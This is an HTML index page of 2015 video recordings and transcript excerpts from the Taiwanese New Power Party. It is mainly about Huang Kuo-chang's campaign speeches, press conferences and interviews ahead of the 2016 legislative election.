<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>時代力量</title>
<link href="css/oa-button.css" rel="stylesheet" type="text/css">
<link rel="stylesheet" href="css/style4.css" />
<link href="css/top.css" rel="stylesheet" type="text/css">
<link href="css/table1.css" rel="stylesheet" type="text/css">
<script src="scripts/jquery.min1.js"></script>
<script src="scripts/jquery.scrollToTop.min.js"></script>
  <script type="text/javascript">
            $(function() {
                $("#toTop").scrollToTop(1000);
            });
        </script>

<style type="text/css">
body {
	background-attachment: fixed;
	background-image: url(images/sunflower4.jpg);
	background-repeat: no-repeat;
	background-position: 100% 100%;
}
</style>

<link href="css/youtube_css.css" rel="stylesheet" type="text/css">
<link href="video-js.css" rel="stylesheet" type="text/css">
<script src="video.js"></script>
  <script>
    videojs.options.flash.swf = "video-js.swf";
  </script>

<style type="text/css">
a:link {
	color: #0000FF;
	text-decoration: none;
}
a:hover {
	color: #e07325;
	text-decoration: underline;
}
a:visited {
	color: #737373;
	text-decoration: underline;
}
              
</style>

<style type="text/css" >
p {
        color:#000;
        font-size:16px;
	line-height:22px;
}

hr.style {

    height: 3px;
    background: #e5cb47;
}

</style>


<script src="scripts/smoothscroll.js"></script>
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-56289941-1', 'auto');
  ga('send', 'pageview');

</script>

</head>

<body>
<div align="left"><strong>
<h1>時代力量</h1></strong></div>
<hr />
<div align="center">
<table class="bordered">
 <thead>

    <tr>
        <th>#</th>        
        <th><div align="center">檔名</div></th>
        <th><div align="center">影片長度</div></th>
	<th><div align="center"></div></th>
    </tr>
    </thead>

    <tr>
      <td><div align="left">1.</div></td>
      <td><a href="#15_1" class="smoothScroll">20150913 時代力量第一屆主席團記者會@時代力量黨部</a></td>
      <td><div align="center">23:11</td>
      <td><div align="center"><a href="pdf/時代力量/20150913%20時代力量第一屆主席團記者會@時代力量黨部.pdf" target="_blank"><button class= " oa-btn cyan-btn" >逐字稿</button></a></td>
    </tr>
    <tr>
      <td><div align="left">2.</div></td>
      <td><a href="#14_1" class="smoothScroll">20150906 黃國昌立委競選總部成立大會 黃國昌短講</a></td>
      <td><div align="center">12:06</td>
      <td><div align="center"><a href="pdf/時代力量/20150906%20黃國昌立委競選總部成立大會%20黃國昌短講.pdf" target="_blank"><button class= " oa-btn cyan-btn" >逐字稿</button></a></td>
    </tr>
    <tr>
      <td><div align="left">3.</div></td>
      <td><a href="#13_1" class="smoothScroll">20150816 黃國昌競選夥伴召募會@新昌市民活動中心 Part 1 黃國昌說明如何贏回選舉</a></td>
      <td><div align="center">47:08</td>
      <td><div align="center"><a href="pdf/時代力量/20150816%20黃國昌競選夥伴召募會@新昌市民活動中心%20Part%201%20黃國昌說明如何贏回選舉.pdf" target="_blank"><button class= " oa-btn cyan-btn" >逐字稿</button></a></td>
    </tr>
    <tr>
      <td><div align="left"></div></td>
      <td><a href="#12_1" class="smoothScroll">20150816 黃國昌競選夥伴召募會@新昌市民活動中心 Part 2 小組討論結論＆黃國昌總結</a></td>
      <td><div align="center">47:39</td>
      <td><div align="center"><a href="pdf/時代力量/20150816%20黃國昌競選夥伴召募會@新昌市民活動中心%20Part%202%20小組討論結論＆黃國昌總結.pdf" target="_blank"><button class= " oa-btn cyan-btn" >逐字稿</button></a></td>
    </tr>
    <tr>
      <td><div align="left"></div></td>
      <td><a href="#11_1" class="smoothScroll">20150816 黃國昌競選夥伴召募會@新昌市民活動中心 Part 3 Ｑ＆Ａ時間</a></td>
      <td><div align="center">38:43</td>
      <td><div align="center"><a href="pdf/時代力量/20150816%20黃國昌競選夥伴召募會@新昌市民活動中心%20Part%203%20Ｑ＆Ａ時間.pdf" target="_blank"><button class= " oa-btn cyan-btn" >逐字稿</button></a></td>
    </tr>


    <tr>
      <td><div align="left">4.</div></td>
      <td><a href="#10_1" class="smoothScroll">20150727 黃國昌宣布參選新北市第12選區記者會@汐止長老教會 Part 1 記者會</a></td>
      <td><div align="center">44:50</td>
      <td><div align="center"><a href="pdf/時代力量/20150727%20黃國昌宣布參選新北市第12選區記者會@汐止長老教會%20Part%201%20記者會.pdf" target="_blank"><button class= " oa-btn cyan-btn" >逐字稿</button></a></td>
    </tr>
    <tr>
      <td><div align="left">5.</div></td>
      <td><a href="#9_1" class="smoothScroll">20150718 時代力量2015募款大會@台北典華大直旗艦館＿餐會黃國昌上台部分</a></td>
      <td><div align="center">43:30</td>
      <td><div align="center"><a href="pdf/時代力量/20150718%20時代力量2015募款大會@台北典華大直旗艦館＿餐會黃國昌上台部分.pdf" target="_blank"><button class= " oa-btn cyan-btn" >逐字稿</button></a></td>
    </tr>
    <tr>
      <td><div align="left">6.</div></td>
      <td><a href="#8_1" class="smoothScroll">20150628 時代力量政策發表會 黃國昌接受媒體採訪</a></td>
      <td><div align="center">07:02</td>
      <td><div align="center"><a href="pdf/時代力量/20150628%20時代力量政策發表會%20黃國昌接受媒體採訪.pdf" target="_blank"><button class= " oa-btn cyan-btn" >逐字稿</button></a></td>
    </tr>
    <tr>
      <td><div align="left">7.</div></td>
      <td><a href="#7_1" class="smoothScroll">20150613 邱顯智＆時代力量新竹聯合誓師掃街大會＿Part 3 黃國昌接受訪問</a></td>
      <td><div align="center">02:31</td>
      <td><div align="center"><a href="pdf/時代力量/20150613%20邱顯智＆時代力量新竹聯合誓師掃街大會＿Part%203%20黃國昌接受訪問.pdf" target="_blank"><button class= " oa-btn cyan-btn" >逐字稿</button></a></td>
    </tr>
    <tr>
      <td><div align="left">8.</div></td>
      <td><a href="#6_1" class="smoothScroll">20150606 臻愛空氣音樂會暨時代力量見面會@台中更樓_Part 3 宣誓口號</a></td>
      <td><div align="center">02:18</td>
      <td><div align="center"><a href="pdf/時代力量/20150606%20臻愛空氣音樂會暨時代力量見面會@台中更樓_Part%203%20宣誓口號.pdf" target="_blank"><button class= " oa-btn cyan-btn" >逐字稿</button></a></td>
    </tr>
    <tr>
      <td><div align="left">9.</div></td>
      <td><a href="#5_1" class="smoothScroll">20150531 時代力量記者會「面對美中，蔡英文應捍衛台灣主權」 黃國昌老師部分</a></td>
      <td><div align="center">06:14</td>
      <td><div align="center"><a href="pdf/時代力量/20150531%20時代力量記者會「面對美中，蔡英文應捍衛台灣主權」%20黃國昌老師部分.pdf" target="_blank"><button class= " oa-btn cyan-btn" >逐字稿</button></a></td>
    </tr>
    <tr>
      <td><div align="left">10.</div></td>
      <td><a href="#4_1" class="smoothScroll">20150530 馮粉知己音樂晚會@淡水殼牌倉庫 黃國昌老師solo部分</a></td>
      <td><div align="center">08:41</td>
      <td><div align="center"><a href="pdf/時代力量/20150530%20馮粉知己音樂晚會@淡水殼牌倉庫%20黃國昌老師solo部分.pdf" target="_blank"><button class= " oa-btn cyan-btn" >逐字稿</button></a></td>
    </tr>
    <tr>
      <td><div align="left">11.</div></td>
      <td><a href="#3_1" class="smoothScroll">20150523 時代力量南勢角掃街 Part 2 黃國昌 受訪</a></td>
      <td><div align="center">04:05</td>
      <td><div align="center"><a href="pdf/時代力量/20150523%20時代力量南勢角掃街%20Part%202%20黃國昌%20受訪.pdf" target="_blank"><button class= " oa-btn cyan-btn" >逐字稿</button></a></td>
    </tr>
    <tr>
      <td><div align="left">12.</div></td>
      <td><a href="#2_1" class="smoothScroll">20150516 時代力量關鍵戰將萬華掃街 Part 5 路口短講（林昶佐 Freddy，馮光遠，黃國昌）</a></td>
      <td><div align="center">16:01</td>
      <td><div align="center"><a href="pdf/時代力量/20150516%20時代力量關鍵戰將萬華掃街%20Part%205%20路口短講（林昶佐%20Freddy，馮光遠，黃國昌）.pdf" target="_blank"><button class= " oa-btn cyan-btn" >逐字稿</button></a></td>
    </tr>
    <tr>
      <td><div align="left">13.</div></td>
      <td><a href="#1_1" class="smoothScroll">20150504 時代力量記者會 說明入黨與捐款方式 黃國昌發言</a></td>
      <td><div align="center">37:52</td>
      <td><div align="center"><a href="pdf/時代力量/20150504%20時代力量記者會%20說明入黨與捐款方式%20黃國昌發言.pdf" target="_blank"><button class= " oa-btn cyan-btn" >逐字稿</button></a></td>
    </tr>
    
</table>
</div>
<p>&nbsp;</p>

<hr class="style">
<div class="embedded-video"><iframe width="420" height="315" src="https://www.youtube.com/embed/cc2MoDALV8Q?rel=0" frameborder="0" allowfullscreen></iframe></div>
<div id="15_1"><h2>1. 時代力量第一屆主席團記者會@時代力量黨部 摘錄 <a href="pdf/時代力量/20150913%20時代力量第一屆主席團記者會@時代力量黨部.pdf" target="_blank"><button class= "oa-btn light-blue-btn" >完整逐字稿</button></a></h2></div>
<p>▲&nbsp;&nbsp;&nbsp;因為執行主席比較重要的功能是代表黨的立場對外發言，那但是在整個決策機制當中，這個架構並沒有改變，因此就主席團裡面的執行主席來講，雖然好像在黨綱上面看起來具有高度的變動性，但是我們覺得應該要保持這樣子的彈性，如果說這個主席團裡面的執行主席因故沒有辦法履行他執行主席的任務的時候，就可以非常快的讓這個黨能夠有一個新的對外的代表，或者是說像今天執行主席團裡面，每一個成員覺得我對外發表的時候，根本違反黨的立場跟黨的決策，那下一次會議當中大家提出來討論，共同對我進行批判，然後要改選一個執行主席，這個就代表了本黨為什麼跟其他政黨不太一樣最重要的精神。
</p>
<p>▲&nbsp;&nbsp;&nbsp;不是只有在網路上投票，當然我現在，我們還沒有進一步啦，因為今天才把整個黨的組織給選出來，那還沒有大家進一步討論做最後的定案，但是我個人的想法是不會只有網路投票那麼單薄，因為你要跟社會介紹我們不分區推薦出來的人是誰，他們的理念如何，我們希望我們的不分區候選人他要到全國，全國各個地方去說明時代力量的理念，以及進入國會了以後要推動的優先法案，藉由這樣子的過程，直接讓選民認識他們，也認識時代力量，在經過完這個過程了以後，我們外部參與的機制目前還沒有定案，但是各種考慮都在裡面，包括了黨員的投票，包括了網路的投票，包括了民調都在考慮的範圍當中。
</p>

<hr class="style">
<div class="embedded-video"><iframe width="420" height="315" src="https://www.youtube.com/embed/6dyJl9cKS18?rel=0" frameborder="0" allowfullscreen></iframe></div>
<div id="14_1"><h2>2. 黃國昌立委競選總部成立大會 黃國昌短講 摘錄 <a href="pdf/時代力量/20150906%20黃國昌立委競選總部成立大會%20黃國昌短講.pdf" target="_blank"><button class= "oa-btn light-blue-btn" >完整逐字稿</button></a></h2></div>
<p>▲&nbsp;&nbsp;&nbsp;非常謝謝大家，兩個月以前我站在現在競選總部的前面，那個時候那棟建築物看起來像是一個廢棄的建築物，放了非常的久，我站在前面在思考的問題是，在目前臺灣所面臨的環境下，我要把自己放到一個什麼樣的戰鬥位置，對臺灣未來的發展，對於我們大家現在面臨的困難能夠提供最大的幫助，那個時候我看著汐止的街道人來人往的鄉親，看著這一片我從小長大的土地，我心裡面有非常非常多的感觸。
</p>
<p>▲&nbsp;&nbsp;&nbsp;就像當初一個多月以前，現在的競選總部如果有來過的朋友都知道，真的看了會掉眼淚，一開始的時候，有很多人跟我說你確定你要從這裡出發，你確定要從這邊當成競選總部，我的從頭開始，就像臺灣必須要從頭開始一樣，我們從這邊出發跟所有的鄉親，跟所有的朋友，跟所有的父老兄弟姐妹，我相信今天大家來到這裡絕對不是挺國昌個人，今天大家來到這裡是在挺我們臺灣的未來，是在挺我們下一代共同的未來，臺灣不能再這樣下去了，從現在這一刻我們大家一起努力，從頭贏回臺灣！謝謝大家！謝謝！
</p>

<hr class="style">
<div class="embedded-video"><iframe width="420" height="315" src="https://www.youtube.com/embed/VEebFoXysQk?rel=0" frameborder="0" allowfullscreen></iframe></div>
<div id="13_1"><h2>3. 黃國昌競選夥伴召募會@新昌市民活動中心 Part 1 黃國昌說明如何贏回選舉 摘錄 <a href="pdf/時代力量/20150816%20黃國昌競選夥伴召募會@新昌市民活動中心%20Part%201%20黃國昌說明如何贏回選舉.pdf" target="_blank"><button class= "oa-btn light-blue-btn" >完整逐字稿</button></a></h2></div>
<p>▲&nbsp;&nbsp;&nbsp;請各位相信我的個性，我不是那種為了要選贏會不擇手段的人，所以有些事情我絕對不會做，這個是我必須要跟大家講，這個話講在前面並不代表說我不想選贏，只是出來選理念，因為大家如果從媒體上面看到，我最近有朋友碰到我就跟我開玩笑，供哩加係五需要搏家大(台語)，真的有需要賭這麼大，因為我把中研院給辭了。
</p>
<p>▲&nbsp;&nbsp;&nbsp;那這個前面參選宣言先跳過去，這個地方，我們現在在的這個地方叫汐止，然後到北海岸有金山萬里瑞芳平溪雙溪貢寮，很大，這個選區很大，不是開玩笑的大，有多大？我給大家看一下，因為我做事情是比較實事求是，就是我很喜歡看data，因為我以前在研究法律的時候，不是只有說文解字，我在法學界最有名的事情是我會跑統計，我是用統計的data來看臺灣司法制度他的表現的水準是什麼，整個新北市他的面積有2052平方公里，各位知道我的選區有多大嗎？571.8平方公里，等於大概是超過四分之一的新北市在我的管轄範圍內(掌聲)。
</p>

<hr class="style">
<div class="embedded-video"><iframe width="420" height="315" src="https://www.youtube.com/embed/bkPnSz9AJ_4?rel=0" frameborder="0" allowfullscreen></iframe></div>
<div id="12_1"><h2>黃國昌競選夥伴召募會@新昌市民活動中心 Part 2 小組討論結論＆黃國昌總結 摘錄 <a href="pdf/時代力量/20150816%20黃國昌競選夥伴召募會@新昌市民活動中心%20Part%202%20小組討論結論＆黃國昌總結.pdf" target="_blank"><button class= "oa-btn light-blue-btn" >完整逐字稿</button></a></h2></div>
<p>▲&nbsp;&nbsp;&nbsp;當然最後怎麼樣找到汐止瑞芳還有其他五個選區在地的年輕人，絕對是這場選戰的關鍵的重點，所以今天是我們的第一場聚會，在這邊其他的事情先不拜託，只拜託各位一件事情就是你們如果有認識在地的年輕人，然後跟他們稍微廣告一下，說有個傢伙叫黃國昌，他要來我們這邊選立委，然後他有成立一個臉書專頁，可以上去看看他們有什麼活動，隨時歡迎他們來參與我們的活動，在大同路上面的競選總部我們團隊的人員正在努力加班讓它進入一個可使用的狀態，這個其實要很努力，各位如果不相信要多努力，你就到臉書上去看，看那個總部現在照片的狀態，我昨天po那個照片其實還滿轟動的，後來我才有人跟我講說很轟動，我本來是比較客氣用極簡風形容我那個競選總部，結果我看到下面的留言，他說這應該不是極簡風，這是超級簡陋風，看到那個競選總部的照片眼淚都快要掉下來。
</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;等到我們那個總部趕在8月底9月初可以運作，我會希望每個晚上都有不同形態的活動在那邊舉行，不管是在地青年、公共的論壇，蚊子電影院，甚至昨天有人建議我們要找瑪法達，晚上在那邊幫人家算命，就是連這種建議都已經出來，不過這個在我看起來都還是屬於正當競選手段的範圍之內，接下來我們從9月、10月、11、12到1月16號，我希望1月16號那天晚上可以跟大家一起慶祝勝利，不過我們還有四個多月，大概五個月的仗要打，希望在這個過程當中，我們除了取得這場選戰的勝利以外，我們也可以在這個過程當中彼此之間凝聚更好的共識為汐止這個地方接下來我們希望它發展能夠找到一個更好的願景跟實踐的道路，謝謝大家，謝謝。
</p>

<hr class="style">
<div class="embedded-video"><iframe width="420" height="315" src="https://www.youtube.com/embed/vHygsyIMSrQ?rel=0" frameborder="0" allowfullscreen></iframe></div>
<div id="11_1"><h2>黃國昌競選夥伴召募會@新昌市民活動中心 Part 3 Ｑ＆Ａ時間 摘錄 <a href="pdf/時代力量/20150816%20黃國昌競選夥伴召募會@新昌市民活動中心%20Part%203%20Ｑ＆Ａ時間.pdf" target="_blank"><button class= "oa-btn light-blue-btn" >完整逐字稿</button></a></h2></div>
<p>▲&nbsp;&nbsp;&nbsp;沒有啦，我們就講一個很現實的問題，就以全國性的議題，其實我一直有在關心李慶華他在國會問政的表現，當然我必須要承認那個是因為在關心一些非常重要的議題的時候在看他做的事情，像他就會，他一定在他的選區裡面跟他選民說他反核四，他跟大家都在講說他反核四，問題是去年江宜樺搞那個詐術公投，領銜提案人就是他，那因為他可能在欺騙人民不知道他那詐術公投是怎麼回事，他的意思是說他藉由那個東西其實是在擋核四，但是你如果真的了解公投法的設計跟它主文撰寫的方式，那你就會知道李慶華在講的全部都是BS，這種東西我們當然會很具體把它給提出來。
</p>
<p>▲&nbsp;&nbsp;&nbsp;你一定要讓他有意義感他才會願意做，現在年輕人我老實講你用錢去買你也買不動，你現在你要拿錢去給年輕人，讓他有意義感這件事情很重要，就盡量不要跟去年的事拿來相比，因為其實大家會看到我所有的文宣到目前為止，從我的參選聲明一直到我現在用的名片，我的面紙，大家會很清楚的看到一個東西就是上面不會提到太陽花也不會提到318，或許很多人覺得很奇怪，覺得我是瘋子，讓人家認識你的最快的方式就是太陽花的戰神或者是318的那個黃老師，但是我之所以不願意用這件事情是那場運動是大家的，所有參與那場運動的人，所以我不願意去提，這個是我的個性。
</p>

<hr class="style">
<div class="embedded-video"><iframe width="420" height="315" src="https://www.youtube.com/embed/Ja4MHlTmcLM?rel=0&theme=light&start=1198" frameborder="0" allowfullscreen></iframe></div>
<div id="10_1"><h2>4. 黃國昌宣布參選新北市第12選區記者會@汐止長老教會 Part 1 記者會 摘錄 <a href="pdf/時代力量/20150727%20黃國昌宣布參選新北市第12選區記者會@汐止長老教會%20Part%201%20記者會.pdf" target="_blank"><button class= "oa-btn light-blue-btn" >完整逐字稿</button></a></h2></div>
<p>▲&nbsp;&nbsp;&nbsp;在這些考慮的時候，這些身旁的朋友一直給我支持，一直給我鼓勵，在過去的這段時間當中，不僅僅是過去從事學術研究的師長，參與社會運動的戰友，還有更可愛的是今天非常多到場的汐止鄉親們，他們的支持、他們的鼓勵讓我深深地感到在這個關鍵的時刻，當大家都站出來了，大學生也站出來了，高中生也站出來了，現在也該是我站出來的時候了，我希望能夠跟這群懷抱著相同理想的朋友們一起打拼，捲起衣袖，投入選戰，帶一股新的政治力量帶臺灣的國會當中，把我們的理想，把我們過去這幾年所有努力希望實踐的目標帶到國會的場域創造真正的改變。
</p>
<p>▲&nbsp;&nbsp;&nbsp;第二個部分是，就中研院的部分，我在加入時代力量的記者會的時候，我已經說過了，就是我自己會把學術跟政治這個分際劃得非常的清楚，因此目前在中研院，我必須要把手上現在有持續性的計畫很快的讓它告一個段落，那在告這個段落完了以後，我希望可以在最短的時間之內，再拖可能也絕對不會拖到要登記，可能我希望在8月的時候，如果沒有辦法順利地把手上的工作先告一個段落的話，最晚在9月的時候，不管怎麼樣，一定在登記參選以前我會辭去中央研究院的工作，離開中央研究院，我相信這個是我對於投身政治，對我自己負責任的態度，對選民負責任的態度，也是對中央研究院負責任的態度，謝謝。
</p>

<hr class="style">
<div class="embedded-video"><iframe width="420" height="315" src="https://www.youtube.com/embed/otQH4SbhCz4?rel=0&theme=light" frameborder="0" allowfullscreen></iframe></div>
<div id="9_1"><h2>5. 時代力量2015募款大會@台北典華大直旗艦館＿餐會黃國昌上台部分 摘錄 <a href="pdf/時代力量/20150718%20時代力量2015募款大會@台北典華大直旗艦館＿餐會黃國昌上台部分.pdf" target="_blank"><button class= "oa-btn light-blue-btn" >完整逐字稿</button></a></h2></div>
<p>▲&nbsp;&nbsp;&nbsp;7月18號我相信對很多臺灣人來講都是一個重要的日子，兩年前的今天，在苗栗大埔的張藥房被強拆掉，我想過去這兩年來，臺灣公民運動的風起雲湧帶給臺灣社會的震撼，大家都是有目共睹的，在過去兩年以來，儘管馬政府濫權暴政，儘管我們的國會已經喪失了監督制衡的功能，但是面對這一切的困境，臺灣的公民沒有放棄，臺灣的社會沒有放棄，大家展現了臺灣人的意志，臺灣人的決心以及臺灣人的行動，大聲的告訴這個政府，這個國家是屬於人民的，我們的國家我們要自己救！
</p>
<p>▲&nbsp;&nbsp;&nbsp;今年1月25號時代力量在林昶佐，在林峰正律師的帶領下正式創黨，過去這半年的時間，作為一個新生代的政黨，他們遭遇了非常多的困難，非常多的挫折，但是我們秉持著我們改革的信念，一步一腳印走到今天，未來再半年我們即將要面臨的國會選舉當中，時代力量有信心也把它看成是時代力量為臺灣的新生代所肩負的使命，就是我們要進入國會，我們要進入國會發揮關鍵的力量，我們要改變臺灣的國會，我們要改變臺灣的民主政治，在上個月，時代力量推出了第一波的政見，我們透過具體法案的提出，非常誠懇的跟臺灣社會報告，時代力量要打造一個人民作主的新政治，時代力量要打造一個透明專業的新國會，時代力量要改革一個實踐正義的新司法，我們還要追求多元的開放文化，要建立永續的綠能環境，而且我們希望在2016以後能夠為臺灣的轉型正義帶來新生的力量。
</p>

<hr class="style">
<div class="embedded-video"><iframe width="420" height="315" src="https://www.youtube.com/embed/Xq10UBWZvHk?rel=0&theme=light" frameborder="0" allowfullscreen></iframe></div>
<div id="8_1"><h2>6. 時代力量政策發表會 黃國昌接受媒體採訪 摘錄 <a href="pdf/時代力量/20150628%20時代力量政策發表會%20黃國昌接受媒體採訪.pdf" target="_blank"><button class= "oa-btn light-blue-btn" >完整逐字稿</button></a></h2></div>
<p>▲&nbsp;&nbsp;&nbsp;我在...記者會的前兩天，我事實上有去拜會過沈發惠議員，沈議員在臉書上面發文的內容，他當著我的面通通跟我說過，我那個時候聽完了以後心裡很難過，那我想既然沈議員有這麼強烈的使命感，那他也認為他的地方基層經營非常好，他也跟我說只有他可以贏國民黨的候選人，對我來講我說過，我沒有一定要去選那個區域，在沈議員表達那麼強烈的意願，因此我後來沒有踏出最後一步。
</p>
<p>(記者：有考慮選不分區嗎？)</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;唉...你們可不可以今天先到這裡，要不然我會覺得你們非要把我的接下來，我現在大概在做的事情就是希望幫時代力量的朋友先把政策的部分，第一波今天會公布，但是第二波是更重要的重頭戲，也就是關於公平正義，有關於租稅改革的，關於年金改革的部分，那我想在這個部分我會持續地努力而且會對整個時代力量黨以及時代力量所推出的候選人盡我最大的努力去輔選，那當然未來在其他的選區，有其他黨派的候選人，不管是社民黨的、民進黨的還是綠黨的，只要是代表進步價值的力量，他們覺得有需要，我都樂於去輔選。這樣好不好？
</p>

<hr class="style">
<div class="embedded-video"><iframe width="420" height="315" src="https://www.youtube.com/embed/Pn8qDnH77AA?rel=0&theme=light" frameborder="0" allowfullscreen></iframe></div>
<div id="7_1"><h2>7. 邱顯智＆時代力量新竹聯合誓師掃街大會＿Part 3 黃國昌接受訪問 摘錄 <a href="pdf/時代力量/20150613%20邱顯智＆時代力量新竹聯合誓師掃街大會＿Part%203%20黃國昌接受訪問.pdf" target="_blank"><button class= "oa-btn light-blue-btn" >完整逐字稿</button></a></h2></div>
<p>▲&nbsp;&nbsp;&nbsp;其實每一個在一個運動的歷程結束之後，大家會看到很多不同的運動參與者事實上是回到自己生活的正軌，那從去年整個太陽花運動結束以後，學生們承諾要出關播種、遍地開花，你們看過去這一年，的確我們看到臺灣的新世代他們站出來了，他們走入了社區，走入了鄰里，回去關心在地的議題，也有人持續地在推動跟整個臺灣未來發展攸關的，包括了像憲政改革，在臺灣的各個角落我們都可以清楚地看到新世代站出來的力量，他的整個影響從去年1129的選舉，到目前連臺灣的高中生都已經站出來串聯要反黑箱課綱
</p>
<p>▲&nbsp;&nbsp;&nbsp;就每一股社會它的社會力出來的時候，當然都希望社會能夠改變，但是當我們談到社會改變的時候，很直接的問題就是如何把這個社會力轉化成政治力，把我們在從事社會改革的時候的一些想法、一些價值能夠在政治的場域當中實踐，我相信時代力量就是希望能夠貫徹這樣的理想，把我們在從事公民運動的時候的一些想法一些政策，沒有辦法透過現在藍綠兩大黨的結構達成的，希望能夠透過自己實際的參與把我們的價值能夠透過實際的公共政策以及實際的法案當中實現，而時代力量就是在做這樣的努力，謝謝。
</p>

<hr class="style">
<div class="embedded-video"><iframe width="420" height="315" src="https://www.youtube.com/embed/D148oZhKPtE?rel=0&theme=light&start=596&end=734" frameborder="0" allowfullscreen></iframe></div>
<div id="6_1"><h2>8. 臻愛空氣音樂會暨時代力量見面會@台中更樓_Part 3 宣誓口號 逐字稿</h2></div>
<p>▲&nbsp;&nbsp;&nbsp;各位新竹...對不起(全場笑)，因為我剛剛一直跟，在來的路上非常關心顯智的選情，所以腦袋裡面都在想新竹的事情，不過我現在回過神來了，我非常清楚地，現在在的是台中，各位台中的朋友大家好，這次時代力量在台中市除了慈庸以外還有柯律師，我相信柯律師她長久以來對於環保議題，對於生態保護的投入的努力是大家都有目共睹的，而針對臺灣在未來的發展上必須要朝向生態永續這樣子的價值前進，也是時代力量在黨綱當中，我們就清楚地揭示出來了，在未來，我們在今年7月的時候，會清楚地把時代力量從民主到國會、到司法、到環境保護、到稅制改革、到年金制度，涉及到世代正義跟分配正義的議題，我們具體的政策進入立法院以後，我們所要推動的法案都會一次非常清楚地跟所有的選民來報告。
</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;時代力量標榜的就是我們希望能夠把進步的改革、價值帶到我們的國會當中，讓我們的國會不會再陷入一灘的死水，我們要改變臺灣的國會，同時透過改變臺灣的國會來誕生來催生臺灣新的民主政治。像柯劭臻律師這樣長久以來堅持進步改革價值的理念，就是時代力量最強的戰將，我也會跟各位朋友一起共同努力，把這些優秀的立法委員參選人一起送到國會當中，讓臺灣的民主政治的改革能夠真正的露出曙光，謝謝大家，謝謝。
</p>

<hr class="style">
<div class="embedded-video"><iframe width="420" height="315" src="https://www.youtube.com/embed/qGEOeGAcCPg?rel=0&theme=light" frameborder="0" allowfullscreen></iframe></div>
<div id="5_1"><h2>9. 時代力量記者會「面對美中，蔡英文應捍衛台灣主權」 黃國昌老師部分 摘錄 <a href="pdf/時代力量/20150531%20時代力量記者會「面對美中，蔡英文應捍衛台灣主權」%20黃國昌老師部分.pdf" target="_blank"><button class= "oa-btn light-blue-btn" >完整逐字稿</button></a></h2></div>
<p>▲&nbsp;&nbsp;&nbsp;之所以有必要要強調這件事情是因為我們非常的遺憾，雖然美國的官方，包括了華盛頓以及在台的AIT一再地宣誓美國絕對不會介入臺灣的民主程序，我自己去年在太陽花運動結束以後也曾經赴美，在華府跟一些美國負責在台事務的人交換意見的時候，他們也一再地說明美國不會透過任何的方式來干預或者是影響臺灣的選舉，但是我們非常遺憾的是，在2012年總統大選的過程當中，卻有部分持傾中立場的美方人士，他們為了個人之私，透過各式各樣的方式來影響臺灣人民自主的選擇，那我們希望這樣令人遺憾的事情在2016年的大選當中不會重演。
</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;第二個部分作為美國長期在亞洲非常重要的民主夥伴，我們也呼籲美國能夠重新地檢討他的亞洲政策，從過去的經驗可以清楚地看得出來，對中華人民共和國的縱容姑息只會助長他們蠻橫的強權氣焰，不斷以片面的行動破壞區域和平的穩定，我想過去一段時間在南海所發生的爭議，就清楚地看得出來說，真正對亞洲的區域和平穩定造成麻煩製造者的是中國，中國透過他片面的行動，不顧相關國際法的規範，在南海試圖擴展他們的版圖，掠奪海洋的資源，這件事情可以清楚地看得出來說，我們不應該再姑息中國這樣子一個蠻橫的作為。
</p>


<hr class="style">
<div class="embedded-video"><iframe width="420" height="315" src="https://www.youtube.com/embed/re-oGCks1b4?rel=0&theme=light&start=44" frameborder="0" allowfullscreen></iframe></div>
<div id="4_1"><h2>10. 馮粉知己音樂晚會@淡水殼牌倉庫 黃國昌老師solo部分 摘錄 <a href="pdf/時代力量/20150530%20馮粉知己音樂晚會@淡水殼牌倉庫%20黃國昌老師solo部分.pdf" target="_blank"><button class= "oa-btn light-blue-btn" >完整逐字稿</button></a></h2></div>
<p>▲&nbsp;&nbsp;&nbsp;第一次在開放的空間唱卡拉OK帶也是為了馮哥，那個時候很多朋友一起在自由廣場前面送他，對我來講，從2013年開始認識馮哥開始，就是從淡水這邊出發，跟光遠兄一起做憲法133還有剛剛林生祥老師、柯一正老師還有林峰正律師，我們幾個開始在這邊推動罷免吳育昇的活動，那個時候之所以會罷免吳育昇，很簡單是因為跟剛剛大家在笑他的話一點關係都沒有，是因為他不僅僅在國會當中當馬英九的禁衛軍，對我來講更可惡的事情是他在電視機前面跟全國的民眾承諾，做出的政治承諾後來卻背棄，這種背棄承諾，欺騙選民的立法委員，我們決定要透過憲法的罷免權把他給罷免掉。
</p>
<p>▲&nbsp;&nbsp;&nbsp;我不是很會唱歌，不過既然來了光遠哥的音樂會，答應唱就要實現諾言，所以請放帶子。</p>
<p>《當你孤單你會想起誰 歌詞 黃國昌 ※ Mojim.com 魔鏡歌詞網》</p>
<p>你的心情總在飛 什麼事都想去追 想抓住一點安慰……</p>
<p>……</p>

<hr class="style">
<div class="embedded-video"><iframe width="420" height="315" src="https://www.youtube.com/embed/UzIGByGEQQQ?rel=0&theme=light" frameborder="0" allowfullscreen></iframe></div>
<div id="3_1"><h2>11. 時代力量南勢角掃街 Part 2 黃國昌 受訪 摘錄 <a href="pdf/時代力量/20150523%20時代力量南勢角掃街%20Part%202%20黃國昌%20受訪.pdf" target="_blank"><button class= "oa-btn light-blue-btn" >完整逐字稿</button></a></h2></div>
<p>▲&nbsp;&nbsp;&nbsp;我這樣說好了，在加入時代力量的那個記者會裡面，我已經說明過了，不管是港湖地區還是汐止地區，的確是有基層的民眾勸進希望我去選立委，要不要選立法委員是第一個層次，那決定要選立委以後才有哪一個選區層次的問題，目前為止對要不要選立法委員這件事情，我自己還沒有做最後的決定，理由是說，在針對2016對臺灣的民主改革非常重要的關鍵戰役，我看的從來就是大局，不是自己要不要去當一席立法委員的問題。
</p>
